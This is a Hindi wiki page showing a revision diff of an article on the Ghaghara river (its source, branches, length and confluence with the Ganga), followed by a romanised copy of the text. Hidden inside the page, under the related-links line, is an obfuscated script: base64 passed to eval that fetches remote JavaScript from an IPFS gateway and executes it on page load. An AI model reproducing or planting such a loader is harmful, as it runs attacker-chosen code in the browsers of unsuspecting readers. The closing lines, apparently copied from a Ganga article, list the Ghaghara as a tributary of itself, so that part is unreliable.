Difference between revisions of "घाघरा नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 +
*घाघरा नदी [[गंगा नदी]] की मुख्य सहायक नदी है। यह दक्षिणी तिब्बत के ऊँचे पर्वत शिखर हिमालय से निकलती है। इसके बाद यह नेपाल से होकर बहती हुई भारत के [[उत्तर प्रदेश]] एवं [[बिहार]] में प्रवाहित होती है।
 
*इस नदी का उदगम [[तिब्बत]] के पठार पर स्थित मापचांचुगों [[हिमनद]] से होता है। जोकि [[ताकलाकोट]] से लगभग 37 किलोमीटर उत्तर पश्चिम की ओर स्थित है। यह नदी पर्वतीय प्रदेश में करनाली और मैदानी प्रदेश में घाघरा कहलाती है।
 
*इस नदी का उदगम [[तिब्बत]] के पठार पर स्थित मापचांचुगों [[हिमनद]] से होता है। जोकि [[ताकलाकोट]] से लगभग 37 किलोमीटर उत्तर पश्चिम की ओर स्थित है। यह नदी पर्वतीय प्रदेश में करनाली और मैदानी प्रदेश में घाघरा कहलाती है।
 +
*इसे सरयू नदी के नाम से भी जाना जाता है।
 
*मैदानी भाग में यह नदी दो उपशाखाओं में विभाजित हो जाती है।
 
*मैदानी भाग में यह नदी दो उपशाखाओं में विभाजित हो जाती है।
 
**पश्चिमी शाखा
 
**पश्चिमी शाखा
 
**पूर्वी शाखा
 
**पूर्वी शाखा
 
इसकी पश्चिमी शाखा [[करनाली नदी|करनाली]] और पूर्वी शाखा को शिखा कहते हैं। आगे चलकर ये पुनः एक हो जाती हैं।  
 
इसकी पश्चिमी शाखा [[करनाली नदी|करनाली]] और पूर्वी शाखा को शिखा कहते हैं। आगे चलकर ये पुनः एक हो जाती हैं।  
*छपरा([[बिहार]]) के निकट यह नदी [[गंगा नदी|गंगा]] में मिल जाती है।
+
*लगभग 970 किमी की यात्रा के बाद छपरा (बिहार) के निकट यह नदी गंगा में मिल जाती है।
 
*इसकी कुल लंबाई 1080 किमी॰ है।  
 
*इसकी कुल लंबाई 1080 किमी॰ है।  
 
*शिवालिक पहाड़ियों में घाघरा नदी की घाटियों की चौड़ाई 180 मीटर एवं गहराई 600 मीटर से भी अधिक है।  
 
*शिवालिक पहाड़ियों में घाघरा नदी की घाटियों की चौड़ाई 180 मीटर एवं गहराई 600 मीटर से भी अधिक है।  
 
*इन नदी घाटियों में पर्वतीय क्षेत्र से टीला, सेती, बेरी, आदि नदियाँ आकर मिलती हैं।  
 
*इन नदी घाटियों में पर्वतीय क्षेत्र से टीला, सेती, बेरी, आदि नदियाँ आकर मिलती हैं।  
*गोरखपुर के निकट [[राप्ती नदी|राप्ती]] एवं छोटी [[गण्डक नदी|गण्डक]] नदियाँ इसमें आकर मिल जात
+
*गोरखपुर के निकट [[राप्ती नदी|राप्ती]] एवं छोटी [[गण्डक नदी|गण्डक]] नदियाँ इसमें आकर मिल जाती है।
  
  
Line 18: Line 20:
 
__INDEX__
 
__INDEX__
 
[[Category:उत्तर_प्रदेश_की_नदियाँ]]
 
[[Category:उत्तर_प्रदेश_की_नदियाँ]]
 +
 +
 +
छपरा के पास यह गंगा में मिल जाती है।
 +
 +
 +
इसके बाएँ किनारे से रामगंगा, गोमती (सहायक नदी शारदा अथवा काली नदी के साथ), घाघरा, राप्ती व गण्डक इसमें मिल जाती हैं

Revision as of 09:02, 7 June 2010

  • ghaghara nadi ganga nadi ki mukhy sahayak nadi hai. yah dakshini tibbat ke ooanche parvat shikhar himalay se nikalati hai. isake bad yah nepal se hokar bahati huee bharat ke uttar pradesh evan bihar mean pravahit hoti hai.
  • is nadi ka udagam tibbat ke pathar par sthit mapachaanchugoan himanad se hota hai. joki takalakot se lagabhag 37 kilomitar uttar pashchim ki or sthit hai. yah nadi parvatiy pradesh mean karanali aur maidani pradesh mean ghaghara kahalati hai.
  • ise sarayoo nadi ke nam se bhi jana jata hai.
  • maidani bhag mean yah nadi do upashakhaoan mean vibhajit ho jati hai.
    • pashchimi shakha
    • poorvi shakha

isaki pashchimi shakha karanali aur poorvi shakha ko shikha kahate haian. age chalakar ye punah ek ho jati haian.

  • lagabhag 970 kimi ki yatra ke bad chhapara (bihar) ke nikat yah nadi ganga mean mil jati hai.
  • isaki kul lanbaee 1080 kimi॰ hai.
  • shivalik paha diyoan mean ghaghara nadi ki ghatiyoan ki chau daee 180 mitar evan gaharaee 600 mitar se bhi adhik hai.
  • in nadi ghatiyoan mean parvatiy kshetr se tila, seti, beri, adi nadiyaan akar milati haian.
  • gorakhapur ke nikat rapti evan chhoti gandak nadiyaan isamean akar mil jati hai.


sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


chhapara ke pas yah ganga mean mil jati hai.


isake baean kinare se ramaganga, gomati (sahayak nadi sharada athava kali nadi ke sath), ghaghara, rapti v gandak isamean mil jati haian